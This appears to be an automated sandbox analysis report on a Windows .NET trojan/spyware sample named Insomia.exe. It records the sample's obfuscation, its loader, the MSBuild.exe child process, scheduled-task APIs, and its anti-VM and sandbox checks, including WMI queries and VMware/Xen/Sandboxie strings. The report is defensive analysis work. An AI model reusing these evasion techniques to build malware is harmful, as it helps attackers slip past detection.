Source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004411000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2129972606.0000000005D00000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTvjeza.dll" vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs Insomia.exe
Source: Insomia.exe, 00000000.00000000.2006752294.00000000010C0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMSIX.exeV vs Insomia.exe
Source: Insomia.exe, 00000000.00000002.2132102328.0000000006220000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Insomia.exe
Source: Insomia.exe	Binary or memory string: OriginalFilenameMSIX.exeV vs Insomia.exe

Source: Insomia.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: Insomia.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Insomia.exe, ey.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, zcxcbL2FjIuyD4qvnYk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, zcxcbL2FjIuyD4qvnYk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, zcxcbL2FjIuyD4qvnYk.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, zcxcbL2FjIuyD4qvnYk.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.Insomia.exe.6220000.10.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, Task.cs	Task registration methods: 'RegisterChanges', 'CreateTask'
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, TaskService.cs	Task registration methods: 'CreateFromToken'
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, ITaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask'
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, TaskFolder.cs	Task registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'

Source: 0.2.Insomia.exe.449a728.0.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, TaskPrincipal.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, TaskSecurity.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, TaskSecurity.cs	Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, Task.cs	Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, TaskFolder.cs	Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, User.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 2_2_0043CB40 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_0043CB40

Source: C:\Users\user\Desktop\Insomia.exe

Mutant created: NULL

Source: Insomia.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: Insomia.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\Insomia.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Insomia.exe

ReversingLabs: Detection: 18%

Source: unknown	Process created: C:\Users\user\Desktop\Insomia.exe "C:\Users\user\Desktop\Insomia.exe"
Source: C:\Users\user\Desktop\Insomia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\Insomia.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\Insomia.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\Insomia.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Insomia.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Insomia.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Insomia.exe

Static file information: File size 2786168 > 1048576

Source: Insomia.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x14c800

Source: Insomia.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004411000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2132102328.0000000006220000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004411000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2132102328.0000000006220000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, zcxcbL2FjIuyD4qvnYk.cs

.Net Code: Type.GetTypeFromHandle(tC49ZZM6RFfCLamSbip.GUIbLw6PnM(16777354)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(tC49ZZM6RFfCLamSbip.GUIbLw6PnM(16777253)),Type.GetTypeFromHandle(tC49ZZM6RFfCLamSbip.GUIbLw6PnM(16777285))})

.NET source code contains potential unpacker

Source: Insomia.exe, e.cs	.Net Code: e System.Reflection.Assembly.Load(byte[])
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Insomia.exe.6220000.10.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Insomia.exe.449a728.0.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Insomia.exe.47f3218.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Insomia.exe.6150000.9.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.Insomia.exe.6150000.9.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.Insomia.exe.6150000.9.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.Insomia.exe.6150000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.Insomia.exe.6150000.9.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull

Yara detected Costura Assembly Loader

Source: Yara match	File source: 0.2.Insomia.exe.60d0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Insomia.exe.60d0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2131556246.00000000060D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Insomia.exe PID: 6572, type: MEMORYSTR

Source: Insomia.exe

Static PE information: real checksum: 0x2adb36 should be: 0x2a9e3d

Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E96174 push eax; ret	0_2_05E96175
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E91DF0 pushad ; iretd	0_2_05E91DF9
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05E9D9B8 push esp; iretd	0_2_05E9D9B9
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_05EF3C42 push esp; retf	0_2_05EF3C49
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061AD6D1 push 9C05ED8Eh; ret	0_2_061AD6DD
Source: C:\Users\user\Desktop\Insomia.exe	Code function: 0_2_061AFAE2 push AC05EDA2h; ret	0_2_061AFAED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0044C2E5 push 00E26845h; iretd	2_2_0044C2EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0044BAAF push ds; iretd	2_2_0044BAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 2_2_0044B705 push ebp; ret	2_2_0044B766

Source: Insomia.exe

Static PE information: section name: .text entropy: 7.9637366137396635

Source: 0.2.Insomia.exe.5d00000.6.raw.unpack, r6i9eNxSdtRsk3n5t8a.cs	High entropy of concatenated method names: 'Egaxd7S05b', 'PnPxTPRvf6', 'Q2dxXnNloo', 'SdpxnPeoKY', 'phHxY5b4hx', 'yGsx71gFNo', 'CCRxE5wuNd', 'D9wxyOIfp0', 'd9AxrScygS', 'wJKxHL3rVY'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, nqwVODGjwSvB8qSp34U.cs	High entropy of concatenated method names: 'zfCGawWg8X', 'hrXGb4rT8Q', 'DFKGs77kQq', 'JxEGZZT1Im', 'cG2GgtRRe2', 'xpCGOhPKMT', 'xjZGzr6QZM', 'vdeI158ryJ', 'RRGIxgZqyL', 'jAsIoMjSlj'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, r6i9eNxSdtRsk3n5t8a.cs	High entropy of concatenated method names: 'Egaxd7S05b', 'PnPxTPRvf6', 'Q2dxXnNloo', 'SdpxnPeoKY', 'phHxY5b4hx', 'yGsx71gFNo', 'CCRxE5wuNd', 'D9wxyOIfp0', 'd9AxrScygS', 'wJKxHL3rVY'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, w4CIrMMRn6xw8dIX1j8.cs	High entropy of concatenated method names: 'IeSMUioSbg', 'e0SM8I0N2R', 'zWlMjunpPj', 'XbMMBRssEU', 'JpYMa5NmEo', 'R7TMuLNPPy', 'HYiMblDuI6', 'uMQM9M1nxY', 'f8MMsR2imH', 'iMHMP4uULT'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, zcxcbL2FjIuyD4qvnYk.cs	High entropy of concatenated method names: 'T6Nb1Wjz9r62tKECRLK', 'ec1hiQB1neXToyN6UjS', 'YXOMQuTDnB', 'vh0ry9Sq2v', 'HTrMXTIbfw', 'BxCMeQUdy1', 'xTVMn22JSr', 'RU3McHa6ok', 'BI7boSriqj', 'wmF2AHEEMV'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, NKMDaBMZht1X4nP31oy.cs	High entropy of concatenated method names: 'yvS7gG8Mgy', 'Ofc7OisPax', 'ysi7zXVoSx', 'EJsD1ZkYSQ', 'a4aDxX8qpq', 'iZaDoewLym', 'zN0Dqkweqr', 'SDkX79rsFO', 'EXXDLaMIfJ', 'FxPD4HFIJs'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, ETQ7hnp9TDdydlyLRBr.cs	High entropy of concatenated method names: 'kQednDL9O2', 'eSedcCPCC7', 'l3rdYrSWhJ', 'dos0y5j7nQt1HhVylQY', 'f4I43IjDHySwOtw4Aa8', 'v18pPnC4Hl', 'Ip0pZIB2xA', 'E2ZpgunhVB', 'tAnpObOxvo', 'ArqpzMOVLt'
Source: 0.2.Insomia.exe.465a5b8.3.raw.unpack, BKqDUndUOUwUuWFVyMr.cs	High entropy of concatenated method names: 'PmaduujrUO', 'fbIdbE1YQQ', 'Yfxd9QgL7f', 'ssBdsOTQxK', 'ewsdPYei4J', 'B5JdZfapYN', 'Cn8dgrg0F3', 'mhjdOerGE3', 'P0NdzLTKr1', 'QNP21MLWmY'

Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: Insomia.exe PID: 6572, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\Insomia.exe	Memory allocated: 16D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory allocated: 3410000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Insomia.exe	Memory allocated: 1AA0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Window / User API: threadDelayed 6529

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5144	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 1400	Thread sleep count: 6529 > 30			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Last function: Thread delayed

Source: MSBuild.exe, 00000002.00000002.3270264909.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWY
Source: Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware\|VIRTUAL\|A M I\|Xen
Source: MSBuild.exe, 00000002.00000002.3270264909.00000000010A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
